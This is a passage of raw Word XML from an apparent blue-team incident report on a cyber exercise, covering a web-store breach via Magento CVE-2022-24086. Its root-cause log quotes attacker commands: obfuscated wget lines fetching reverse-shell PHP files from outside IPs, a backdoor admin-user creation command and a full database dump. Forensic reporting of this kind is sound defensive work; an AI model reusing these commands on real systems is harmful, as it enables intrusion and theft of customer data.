      <w:r w:rsidR="51701CC5" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> improve</w:t>
      </w:r>
      <w:r w:rsidR="00AF2E83" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="51701CC5" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and implement more SIEM rules which would allow faster detection of red team tactics and procedures. Built</w:t>
      </w:r>
      <w:r w:rsidR="5E3D498D" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SIEM rules were inadequate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413E10C0" w14:textId="5F0DBF22" w:rsidR="00C802EA" w:rsidRPr="00CF248A" w:rsidRDefault="00E97D52" w:rsidP="00CF248A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In summary, the exercise objectives were fulfilled as follows. We were able to identify suspicious behavior and security incidents in the network quickly, and provided thorough reports on them and their risk level to the White Team.</w:t>
      </w:r>
      <w:r w:rsidR="00B705AF" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A communication plan was developed by the team to examine and report security incidents. The security issues' mitigation plans were quickly identified, however most of the time team simply permitted to report the incidents rather than carry out the planned mitigation.</w:t>
      </w:r>
      <w:r w:rsidR="00C840B1" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each team member was assigned a responsible </w:t>
      </w:r>
      <w:r w:rsidR="00C840B1" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="005D3157" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / service</w:t>
      </w:r>
      <w:r w:rsidR="00C840B1" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of their own. Other members </w:t>
      </w:r>
      <w:r w:rsidR="005C5BE7" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aided</w:t>
      </w:r>
      <w:r w:rsidR="00C840B1" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> if someone needed </w:t>
      </w:r>
      <w:r w:rsidR="005C5BE7" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>assistance</w:t>
      </w:r>
      <w:r w:rsidR="00C840B1" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with something, such identifying the attack vectors.</w:t>
      </w:r>
      <w:r w:rsidR="00C30A7A" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73978E6D" w14:textId="054F043C" w:rsidR="00A67A4F" w:rsidRDefault="006A4B48" w:rsidP="00EE0365">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc163900519"/>
      <w:r>
        <w:t>Major incident 1</w:t>
      </w:r>
      <w:r w:rsidR="00152BC5">
        <w:t xml:space="preserve"> – WWW-server breach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="20AA0863" w14:textId="77777777" w:rsidR="00152BC5" w:rsidRDefault="00152BC5" w:rsidP="00152BC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eHarbor became initially aware of the incident 13:54 via some-post made by @</w:t>
      </w:r>
      <w:r w:rsidRPr="00152BC5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jukka_kalma@some.vle.fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 13:52. Apparently, the webstore was modified. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919B70E" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="000D6AA8" w:rsidRDefault="00152BC5" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The investigation was started right away. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22376519" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="000D6AA8" w:rsidRDefault="00152BC5" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CEO was notified 13:57</w:t>
      </w:r>
      <w:r w:rsidR="00C43493" w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3331BF1F" w14:textId="422E2728" w:rsidR="00C43493" w:rsidRPr="000D6AA8" w:rsidRDefault="00152BC5" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">13:59 eHarbor ISIRT proposed blocking external traffic to the server. The request was denied by the CEO.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF8441" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="000D6AA8" w:rsidRDefault="00152BC5" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">14:05 ISIRT proposed to communicate about the issue via some – which was also denied by the CEO. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43622679" w14:textId="029DE24E" w:rsidR="00152BC5" w:rsidRPr="000D6AA8" w:rsidRDefault="00152BC5" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">14:16 ISIRT noticed that the admin-user was disabled. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D92107" w14:textId="5DACEDB0" w:rsidR="00C43493" w:rsidRPr="000D6AA8" w:rsidRDefault="00C43493" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>14:32 Database dump identified. www.eharbor.vle.fi - in context of apache user: Apr 12, 2024 @ 14:00:47.884 mysqldump -u, magento2 -h, localhost -p --all-databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2766EF" w14:textId="1EE14651" w:rsidR="00C43493" w:rsidRPr="000D6AA8" w:rsidRDefault="00C43493" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">14:35 Customer information was published in 8chan. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43535550" w14:textId="6F3114A5" w:rsidR="00C43493" w:rsidRPr="000D6AA8" w:rsidRDefault="00C43493" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">14:42 The root cause was identified. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F1FF91" w14:textId="773DDA35" w:rsidR="00C43493" w:rsidRDefault="00C43493" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">15:18 CEO was informed about the personal data breach. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE92CAD" w14:textId="6F8B0046" w:rsidR="00BD06B8" w:rsidRPr="000D6AA8" w:rsidRDefault="00BD06B8" w:rsidP="00BD06B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CEO responded: “VOI HELVETTI!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB2B586" w14:textId="14C410CC" w:rsidR="00C43493" w:rsidRPr="000D6AA8" w:rsidRDefault="00C43493" w:rsidP="000D6AA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">15:22 Data Privacy Authority informed about the personal data breach via email. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474ABE6A" w14:textId="3A738815" w:rsidR="00E10B13" w:rsidRPr="00F44502" w:rsidRDefault="00C43493" w:rsidP="00FF5EA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6AA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">15:25 Customers informed about the data breach via some. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186D1A3F" w14:textId="7D3871BB" w:rsidR="00C43493" w:rsidRPr="001A24A0" w:rsidRDefault="00C43493" w:rsidP="00FF5EA6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A24A0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Root cause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F58916A" w14:textId="08B1DF33" w:rsidR="00C43493" w:rsidRPr="00C43493" w:rsidRDefault="00C43493" w:rsidP="00C43493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43493">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Red team exploited Magento vulnerability CVE-2022-24086 which is RCE vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF85F8" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apr 12, 2024 @ 13:15:09.168</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B535B9A" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Red team downloaded and executed reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC27FCC" w14:textId="49F6AC61" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh -c wget${IFS%??}-qO${IFS%??}kimi.php${IFS%??}198.18.103.31/kimi.php&amp;quot;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD7E51" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apr 12, 2024 @ 13:18:17.393</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3AEA9" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connection established and enumerated user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5A5154" w14:textId="3E35FA5F" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF042A" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apr 12, 2024 @ 13:21:33.810</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7FBAD0" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Magento administrator user created:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B3940" w14:textId="6DC56705" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php bin/magento admin:user:create --admin-user=Admin_Lisa --admin-password=HackerService9 --admin-email=Lisa.Hackson@webshop.vle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F500618" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apr 12, 2024 @ 13:24:45.344</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C06A93F" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>New revershell downloaded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B2B9F" w14:textId="501B7337" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh -c wget${IFS%??}-qO${IFS%??}kimi.php${IFS%??}198.18.103.31/kimi.php&amp;quot;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78352DA7" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apr 12, 2024 @ 13:34:25.591</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B255708" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>New revershell downloaded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE386BC" w14:textId="2E2C326A" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh, -c, wget${IFS%??}-qO${IFS%??}404.php${IFS%??}198.18.103.76:81/404.php&amp;quot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E49D72" w14:textId="77777777" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apr 12, 2024 @ 14:00:47.884</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF3576B" w14:textId="17080641" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00E10B13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Database dumped:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34076C83" w14:textId="316D7ADD" w:rsidR="00C43493" w:rsidRPr="00E10B13" w:rsidRDefault="00C43493" w:rsidP="00FF5EA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mysqldump -u magento2 -h localhost -p --all-databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C6760" w14:textId="074AB654" w:rsidR="00F44502" w:rsidRPr="001A24A0" w:rsidRDefault="00F44502" w:rsidP="00FF5EA6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A24A0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation plan: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F805EC0" w14:textId="77777777" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inform Data Privacy Authority (Done via Email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABFC750" w14:textId="77777777" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inform customers about the data breach (Done via Some).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E208D" w14:textId="77777777" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
